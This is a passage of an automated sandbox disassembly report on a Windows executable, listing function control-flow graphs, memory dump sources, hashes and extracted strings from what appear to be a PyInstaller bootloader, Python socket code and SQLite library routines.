7ffbaa4976c0-7ffbaa4976fd call 7ffbaa499550 2045->2055 2047 7ffbaa497763-7ffbaa497766 2046->2047 2048 7ffbaa49774f-7ffbaa497752 2046->2048 2051 7ffbaa497768-7ffbaa49776b 2047->2051 2052 7ffbaa49777c-7ffbaa497783 2047->2052 2048->2047 2050 7ffbaa497754-7ffbaa497758 2048->2050 2050->2047 2056 7ffbaa49775a-7ffbaa49775d call 7ffbaa4992f0 2050->2056 2051->2052 2057 7ffbaa49776d-7ffbaa497771 2051->2057 2058 7ffbaa497785 FreeAddrInfoW 2052->2058 2059 7ffbaa49778b-7ffbaa49778e 2052->2059 2054->2010 2060 7ffbaa4977ac-7ffbaa4977b0 2054->2060 2068 7ffbaa49770f-7ffbaa497712 2055->2068 2069 7ffbaa4976ff-7ffbaa497704 2055->2069 2056->2047 2057->2052 2063 7ffbaa497773-7ffbaa497776 call 7ffbaa4992f0 2057->2063 2058->2059 2059->1989 2060->2010 2064 7ffbaa4977b2-7ffbaa4977bb call 7ffbaa4992f0 2060->2064 2063->2052 2064->2010 2068->2054 2072 7ffbaa497718-7ffbaa497728 call 7ffbaa499368 2068->2072 2069->2068 2071 7ffbaa497706-7ffbaa497709 call 7ffbaa4992f0 2069->2071 2071->2068 2076 7ffbaa497793-7ffbaa497795 2072->2076 2077 7ffbaa49772a-7ffbaa49772c 2072->2077 2076->2054 2080 7ffbaa497797-7ffbaa49779b 2076->2080 2078 7ffbaa49773d-7ffbaa497744 2077->2078 2079 7ffbaa49772e-7ffbaa497732 2077->2079 2078->2045 2078->2046 2079->2078 2081 7ffbaa497734-7ffbaa497737 call 7ffbaa4992f0 2079->2081 2080->2054 2082 7ffbaa49779d-7ffbaa4977a0 call 7ffbaa4992f0 2080->2082 2081->2078 2082->2054
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddrFreeInfo$getaddrinfo
                                                                                                                                                                                                                                  • String ID: Int or String expected$OOiii$OO|iiii:getaddrinfo$getaddrinfo() argument 1 must be string or None$idna$iiisO$socket.getaddrinfo
                                                                                                                                                                                                                                  • API String ID: 2288433384-1074899869
                                                                                                                                                                                                                                  • Opcode ID: 31578e94d28b646b1d124d071274d69e5ee20e598ce9ff2e34f2b354b6e2d7d2
                                                                                                                                                                                                                                  • Instruction ID: ae175bb3c18e274c0e1fb70e1b1509865ee23ad9c1701b9869c822e99ff3d8fc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31578e94d28b646b1d124d071274d69e5ee20e598ce9ff2e34f2b354b6e2d7d2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ABC118B6A0A602C6FB56CF31D4C46BC33A8BB48B94F0445B5EE0D52A64DF3DE526C360
                                                                                                                                                                                                                                  Function 00007FF72C651470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                  • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                  • Opcode ID: 00a01140cb6f53c8bf48d507e97df1570cac778f72c2f220bef2ef140620373e
                                                                                                                                                                                                                                  • Instruction ID: 3c93293992452c50435354a42f86e2d4df4e9d2704875170620fcf1a7f9a3b6e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 00a01140cb6f53c8bf48d507e97df1570cac778f72c2f220bef2ef140620373e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A418161A0854385EA02EB21DC411B9F392FFA47E4FE44932EE4D07B99DE3CE5458F64
                                                                                                                                                                                                                                  Function 00007FFBA68143D0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 334COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 2416 7ffba68143d0-7ffba6814494 call 7ffba68140d0 2419 7ffba6814846-7ffba6814849 2416->2419 2420 7ffba681449a-7ffba68144b8 2416->2420 2421 7ffba681484b-7ffba6814851 2419->2421 2422 7ffba6814853-7ffba6814856 call 7ffba6796c40 2419->2422 2423 7ffba68144d2-7ffba68144d6 2420->2423 2424 7ffba68144ba-7ffba68144cd 2420->2424 2421->2422 2425 7ffba681485b-7ffba6814861 call 7ffba67f1280 2421->2425 2422->2425 2428 7ffba68144e6-7ffba68144f2 2423->2428 2429 7ffba68144d8-7ffba68144df 2423->2429 2427 7ffba681486f-7ffba681488e call 7ffba68c2900 2424->2427 2439 7ffba6814866-7ffba6814868 2425->2439 2430 7ffba68144fe-7ffba6814502 2428->2430 2431 7ffba68144f4-7ffba68144f8 2428->2431 2429->2428 2434 7ffba68144e1 call 7ffba67afef0 2429->2434 2437 7ffba6814504-7ffba6814508 2430->2437 2438 7ffba681450a-7ffba681450f call 7ffba67b3790 2430->2438 2431->2430 2436 7ffba681457b-7ffba6814586 2431->2436 2434->2428 2443 7ffba6814590-7ffba68145a7 call 7ffba67bd660 2436->2443 2437->2438 2441 7ffba6814578 2437->2441 2444 7ffba6814514-7ffba6814518 2438->2444 2439->2427 2441->2436 2449 7ffba68145a9-7ffba68145b1 2443->2449 2444->2441 2446 7ffba681451a-7ffba6814527 call 7ffba6852850 2444->2446 2453 7ffba681455e-7ffba6814565 2446->2453 2454 7ffba6814529 2446->2454 2451 7ffba68145be 2449->2451 2452 7ffba68145b3-7ffba68145bc 2449->2452 2455 7ffba68145c1-7ffba68145cf 2451->2455 2452->2455 2456 7ffba681456f-7ffba6814573 2453->2456 2457 7ffba6814567-7ffba681456a call 7ffba6796400 2453->2457 2458 7ffba6814530-7ffba6814539 2454->2458 2459 7ffba6814685 2455->2459 2460 7ffba68145d5-7ffba68145d8 2455->2460 2463 7ffba6814829-7ffba6814831 2456->2463 2457->2456 2458->2458 2464 7ffba681453b-7ffba681454d call 7ffba6796880 2458->2464 2461 7ffba681468a-7ffba681469d 2459->2461 2465 7ffba6814615-7ffba681461b 2460->2465 2466 7ffba68145da-7ffba68145df 2460->2466 2468 7ffba681469f-7ffba68146a4 2461->2468 2469 7ffba68146d3-7ffba68146e6 2461->2469 2471 7ffba681483e-7ffba6814844 2463->2471 2472 7ffba6814833-7ffba6814837 2463->2472 2464->2453 2483 7ffba681454f-7ffba6814559 00007FFBBB593010 2464->2483 2465->2459 2470 7ffba681461d-7ffba6814630 call 7ffba6796880 2465->2470 2466->2465 2467 7ffba68145e1-7ffba68145f6 2466->2467 2474 7ffba681460b-7ffba6814613 call 7ffba67fa830 2467->2474 2475 7ffba68145f8-7ffba68145fb 2467->2475 2476 7ffba68146b6-7ffba68146bd 2468->2476 2477 7ffba68146a6-7ffba68146ab 2468->2477 2479 7ffba68146ec-7ffba68146f4 2469->2479 2480 7ffba68146e8 2469->2480 2498 7ffba6814632-7ffba6814663 2470->2498 2499 7ffba6814666-7ffba681466d 2470->2499 2471->2419 2471->2439 2472->2471 2481 7ffba6814839 call 7ffba67afec0 2472->2481 2474->2461 2475->2474 2484 7ffba68145fd-7ffba68145ff 2475->2484 2488 7ffba68146c0-7ffba68146ce call 7ffba67b2e50 2476->2488 2485 7ffba68146ad-7ffba68146b2 2477->2485 2486 7ffba68146b4 2477->2486 2490 7ffba681473c-7ffba681473e 2479->2490 2491 7ffba68146f6-7ffba6814709 call 7ffba6796880 2479->2491 2480->2479 2481->2471 2483->2453 2484->2474 2493 7ffba6814601-7ffba6814606 2484->2493 2485->2488 2486->2476 2488->2469 2494 7ffba681474b-7ffba68147b9 call 7ffba6799170 call 7ffba680cf30 2490->2494 2495 7ffba6814740-7ffba6814744 2490->2495 2510 7ffba681470b-7ffba681471d 2491->2510 2511 7ffba6814722-7ffba6814729 2491->2511 2501 7ffba681481a-7ffba681481e 2493->2501 2518 7ffba68147bb-7ffba68147c1 call 7ffba6796400 2494->2518 2519 7ffba68147c6-7ffba68147c8 2494->2519 2495->2494 2502 7ffba6814746 2495->2502 2498->2499 2504 7ffba681466f-7ffba6814672 call 7ffba6796400 2499->2504 2505 7ffba6814677-7ffba6814680 2499->2505 2501->2463 2508 7ffba6814820-7ffba6814824 call 7ffba67b4b80 2501->2508 2502->2494 2504->2505 2505->2501 2508->2463 2510->2511 2512 7ffba681472b-7ffba681472e call 7ffba6796400 2511->2512 2513 7ffba6814733-7ffba6814737 2511->2513 2512->2513 2513->2501 2518->2519 2521 7ffba68147d5-7ffba68147d9 2519->2521 2522 7ffba68147ca-7ffba68147d0 call 7ffba67ee490 2519->2522 2524 7ffba68147db-7ffba68147f0 call 7ffba67f1310 2521->2524 2525 7ffba68147f2-7ffba68147f4 2521->2525 2522->2521 2524->2501 2527 7ffba6814805-7ffba6814815 2525->2527 2528 7ffba68147f6-7ffba68147fe 2525->2528 2527->2501 2528->2501 2530 7ffba6814800-7ffba6814803 2528->2530 2530->2501 2530->2527
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFBA6790000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952109608.00007FFBA6790000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F1000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA6908000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952472915.00007FFBA690A000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952519785.00007FFBA690C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6790000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007B593010
                                                                                                                                                                                                                                  • String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                                                                                                                                                                                                  • API String ID: 2201947777-879093740
                                                                                                                                                                                                                                  • Opcode ID: f9f91cf4c879a1f55dcf4b3cc1e56045de927a81096d4cf94589e99b2d0e2aef
                                                                                                                                                                                                                                  • Instruction ID: b6c7ebdfc3e84015a774fd4dadc87d29d548cab808ddf8dfdc655c4141238752
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9f91cf4c879a1f55dcf4b3cc1e56045de927a81096d4cf94589e99b2d0e2aef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AFE19AE2E0A6928AFB12CB75C0506B927AAAB45F98F054277CE1D177D5DF38E852C340
                                                                                                                                                                                                                                  Function 00007FF72C651210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 2531 7ff72c651210-7ff72c65126d call 7ff72c65bd80 2534 7ff72c651297-7ff72c6512af call 7ff72c664f44 2531->2534 2535 7ff72c65126f-7ff72c651296 call 7ff72c652710 2531->2535 2540 7ff72c6512d4-7ff72c6512e4 call 7ff72c664f44 2534->2540 2541 7ff72c6512b1-7ff72c6512cf call 7ff72c664f08 call 7ff72c652910 2534->2541 2547 7ff72c651309-7ff72c65131b 2540->2547 2548 7ff72c6512e6-7ff72c651304 call 7ff72c664f08 call 7ff72c652910 2540->2548 2552 7ff72c651439-7ff72c65146d call 7ff72c65ba60 call 7ff72c664f30 * 2 2541->2552 2551 7ff72c651320-7ff72c651345 call 7ff72c66039c 2547->2551 2548->2552 2560 7ff72c65134b-7ff72c651355 call 7ff72c660110 2551->2560 2561 7ff72c651431 2551->2561 2560->2561 2567 7ff72c65135b-7ff72c651367 2560->2567 2561->2552 2569 7ff72c651370-7ff72c651398 call 7ff72c65a1c0 2567->2569 2572 7ff72c65139a-7ff72c65139d 2569->2572 2573 7ff72c651416-7ff72c65142c call 7ff72c652710 2569->2573 2574 7ff72c65139f-7ff72c6513a9 2572->2574 2575 7ff72c651411 2572->2575 2573->2561 2577 7ff72c6513ab-7ff72c6513b9 call 7ff72c660adc 2574->2577 2578 7ff72c6513d4-7ff72c6513d7 2574->2578 2575->2573 2584 7ff72c6513be-7ff72c6513c1 2577->2584 2579 7ff72c6513d9-7ff72c6513e7 call 7ff72c679e30 2578->2579 2580 7ff72c6513ea-7ff72c6513ef 2578->2580 2579->2580 2580->2569 2583 7ff72c6513f5-7ff72c6513f8 2580->2583 2586 7ff72c65140c-7ff72c65140f 2583->2586 2587 7ff72c6513fa-7ff72c6513fd 2583->2587 2588 7ff72c6513c3-7ff72c6513cd call 7ff72c660110 2584->2588 2589 7ff72c6513cf-7ff72c6513d2 2584->2589 2586->2561 2587->2573 2590 7ff72c6513ff-7ff72c651407 2587->2590 2588->2580 2588->2589 2589->2573 2590->2551
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                  • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                  • Opcode ID: ab383ac4b995131bdd40696453c0f16ebeee9cffe796343d9728e2385cbc1d23
                                                                                                                                                                                                                                  • Instruction ID: d50ba084d5fe2f5b8fd5136801dc8979788115cb1ce4a556445b3f253009d73f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab383ac4b995131bdd40696453c0f16ebeee9cffe796343d9728e2385cbc1d23
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1651D522A0864245E622FB11AC503BAE292FFA47E4FE44535EF4E477D5EE3CE545CB10
                                                                                                                                                                                                                                  Function 00007FFBAA4954AC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 2593 7ffbaa4954ac-7ffbaa4954e0 2594 7ffbaa4954e3-7ffbaa4954e6 2593->2594 2595 7ffbaa4954f8-7ffbaa4954fb 2594->2595 2596 7ffbaa4954e8-7ffbaa4954f0 2594->2596 2599 7ffbaa4954fd-7ffbaa495509 call 7ffbaa4993e8 2595->2599 2600 7ffbaa49551f-7ffbaa49552e call 7ffbaa499450 2595->2600 2597 7ffbaa4954f6 2596->2597 2598 7ffbaa495597-7ffbaa4955a5 call 7ffbaa499568 2596->2598 2601 7ffbaa495531 2597->2601 2646 7ffbaa4955a8 call 7ffbaa49660c 2598->2646 2647 7ffbaa4955a8 call 7ffbaa496bec 2598->2647 2608 7ffbaa495534-7ffbaa49554c call 7ffbaa4948b0 2599->2608 2609 7ffbaa49550b-7ffbaa49550e 2599->2609 2600->2601 2601->2608 2615 7ffbaa49558e-7ffbaa495591 2608->2615 2616 7ffbaa49554e-7ffbaa495551 2608->2616 2612 7ffbaa495514-7ffbaa49551a 2609->2612 2613 7ffbaa495628-7ffbaa495639 call 7ffbaa4994e8 2609->2613 2618 7ffbaa49563f 2612->2618 2613->2618 2614 7ffbaa4955ac-7ffbaa4955b9 call 7ffbaa499490 2624 7ffbaa495619-7ffbaa49561c 2614->2624 2625 7ffbaa4955bb-7ffbaa4955be 2614->2625 2615->2598 2615->2609 2621 7ffbaa495553-7ffbaa495559 WSAGetLastError 2616->2621 2622 7ffbaa49555b-7ffbaa495566 WSAGetLastError 2616->2622 2623 7ffbaa495644-7ffbaa495652 2618->2623 2621->2622 2626 7ffbaa495614-7ffbaa495617 2622->2626 2627 7ffbaa49556c-7ffbaa495574 call 7ffbaa4993b0 2622->2627 2628 7ffbaa495624-7ffbaa495626 2624->2628 2629 7ffbaa49561e 2624->2629 2630 7ffbaa4955c8-7ffbaa4955d3 WSAGetLastError 2625->2630 2631 7ffbaa4955c0-7ffbaa4955c6 WSAGetLastError 2625->2631 2626->2618 2627->2594 2638 7ffbaa49557a-7ffbaa49557d 2627->2638 2628->2623 2629->2628 2633 7ffbaa4955d5-7ffbaa4955dd call 7ffbaa4993b0 2630->2633 2634 7ffbaa4955e1-7ffbaa4955e6 2630->2634 2631->2630 2633->2598 2644 7ffbaa4955df 2633->2644 2639 7ffbaa4955e8-7ffbaa4955f7 WSAGetLastError 2634->2639 2640 7ffbaa49560f-7ffbaa495612 2634->2640 2638->2618 2642 7ffbaa495583-7ffbaa495589 2638->2642 2639->2594 2643 7ffbaa4955fd-7ffbaa495608 WSAGetLastError 2639->2643 2640->2618 2640->2626 2642->2618 2643->2640 2645 7ffbaa49560a 2643->2645 2644->2638 2645->2594 2646->2614 2647->2614
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$select
                                                                                                                                                                                                                                  • String ID: timed out
                                                                                                                                                                                                                                  • API String ID: 1043644060-3163636755
                                                                                                                                                                                                                                  • Opcode ID: fc651cffc8d0259b0e914ce5bfbd73a3b3d15b310cc83588944c491bbca2a8c7
                                                                                                                                                                                                                                  • Instruction ID: c960e4cacc89c28e3e3410244b5ad6dc291a67dab191bca81c6b07fba9c511d8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc651cffc8d0259b0e914ce5bfbd73a3b3d15b310cc83588944c491bbca2a8c7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7141A4E1E0F642C6FA635F35E4C423D6398AF04B64F2441B4ED4D426A5CF3DE86B8622
                                                                                                                                                                                                                                  Function 00007FF72C6536B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,00007FF72C653804), ref: 00007FF72C6536E1
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C653804), ref: 00007FF72C6536EB
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C652C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF72C653706,?,00007FF72C653804), ref: 00007FF72C652C9E
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C652C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF72C653706,?,00007FF72C653804), ref: 00007FF72C652D63
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C652C50: MessageBoxW.USER32 ref: 00007FF72C652D99
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                  • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                  • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                  • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                  • Instruction ID: a21fb4b08906b3152e570bc7fccf02248fe77c7fd2e6215aee0efc2c8f7c518f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C219461F18A4291FA22B720EC153B6A253FFA87B4FE40132D75D865D5EE2CE509CB24
                                                                                                                                                                                                                                  Function 00007FF72C66BA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 2888 7ff72c66ba5c-7ff72c66ba82 2889 7ff72c66ba9d-7ff72c66baa1 2888->2889 2890 7ff72c66ba84-7ff72c66ba98 call 7ff72c664ee8 call 7ff72c664f08 2888->2890 2892 7ff72c66be77-7ff72c66be83 call 7ff72c664ee8 call 7ff72c664f08 2889->2892 2893 7ff72c66baa7-7ff72c66baae 2889->2893 2907 7ff72c66be8e 2890->2907 2910 7ff72c66be89 call 7ff72c66a8e0 2892->2910 2893->2892 2895 7ff72c66bab4-7ff72c66bae2 2893->2895 2895->2892 2898 7ff72c66bae8-7ff72c66baef 2895->2898 2901 7ff72c66bb08-7ff72c66bb0b 2898->2901 2902 7ff72c66baf1-7ff72c66bb03 call 7ff72c664ee8 call 7ff72c664f08 2898->2902 2905 7ff72c66be73-7ff72c66be75 2901->2905 2906 7ff72c66bb11-7ff72c66bb17 2901->2906 2902->2910 2911 7ff72c66be91-7ff72c66bea8 2905->2911 2906->2905 2912 7ff72c66bb1d-7ff72c66bb20 2906->2912 2907->2911 2910->2907 2912->2902 2915 7ff72c66bb22-7ff72c66bb47 2912->2915 2917 7ff72c66bb49-7ff72c66bb4b 2915->2917 2918 7ff72c66bb7a-7ff72c66bb81 2915->2918 2921 7ff72c66bb4d-7ff72c66bb54 2917->2921 2922 7ff72c66bb72-7ff72c66bb78 2917->2922 2919 7ff72c66bb56-7ff72c66bb6d call 7ff72c664ee8 call 7ff72c664f08 call 7ff72c66a8e0 2918->2919 2920 7ff72c66bb83-7ff72c66bbab call 7ff72c66d5fc call 7ff72c66a948 * 2 2918->2920 2949 7ff72c66bd00 2919->2949 2951 7ff72c66bbad-7ff72c66bbc3 call 7ff72c664f08 call 7ff72c664ee8 2920->2951 2952 7ff72c66bbc8-7ff72c66bbf3 call 7ff72c66c284 2920->2952 2921->2919 2921->2922 2923 7ff72c66bbf8-7ff72c66bc0f 2922->2923 2926 7ff72c66bc8a-7ff72c66bc94 call 7ff72c67391c 2923->2926 2927 7ff72c66bc11-7ff72c66bc19 2923->2927 2940 7ff72c66bd1e 2926->2940 2941 7ff72c66bc9a-7ff72c66bcaf 2926->2941 2927->2926 2930 7ff72c66bc1b-7ff72c66bc1d 2927->2930 2930->2926 2934 7ff72c66bc1f-7ff72c66bc35 2930->2934 2934->2926 2938 7ff72c66bc37-7ff72c66bc43 2934->2938 2938->2926 2943 7ff72c66bc45-7ff72c66bc47 2938->2943 2945 7ff72c66bd23-7ff72c66bd43 ReadFile 2940->2945 2941->2940 2946 7ff72c66bcb1-7ff72c66bcc3 GetConsoleMode 2941->2946 2943->2926 2950 7ff72c66bc49-7ff72c66bc61 2943->2950 2953 7ff72c66be3d-7ff72c66be46 GetLastError 2945->2953 2954 7ff72c66bd49-7ff72c66bd51 2945->2954 2946->2940 2948 7ff72c66bcc5-7ff72c66bccd 2946->2948 2948->2945 2955 7ff72c66bccf-7ff72c66bcf1 ReadConsoleW 2948->2955 2958 7ff72c66bd03-7ff72c66bd0d call 7ff72c66a948 